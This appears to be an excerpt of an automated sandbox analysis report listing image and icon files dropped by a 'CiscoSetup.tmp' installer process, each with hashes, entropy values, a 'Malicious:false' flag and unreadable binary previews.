                                                                                                                                                                                                  Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3882
                                                                                                                                                                                                  Entropy (8bit):6.743390042757195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                                                                                  MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                                                                                  SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                                                                                  SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                                                                                  SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10239
                                                                                                                                                                                                  Entropy (8bit):7.950564187811269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                                                                                  MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                                                                                  SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                                                                                  SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                                                                                  SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.020486157649533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                                                                                  MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                                                                                  SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                                                                                  SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                                                                                  SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                                                                                  MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                                                                                  SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                                                                                  SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                                                                                  SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1577
                                                                                                                                                                                                  Entropy (8bit):5.942243839150427
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                                                                                  MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                                                                                  SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                                                                                  SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                                                                                  SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                                                                                  MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                                                                                  SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                                                                                  SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
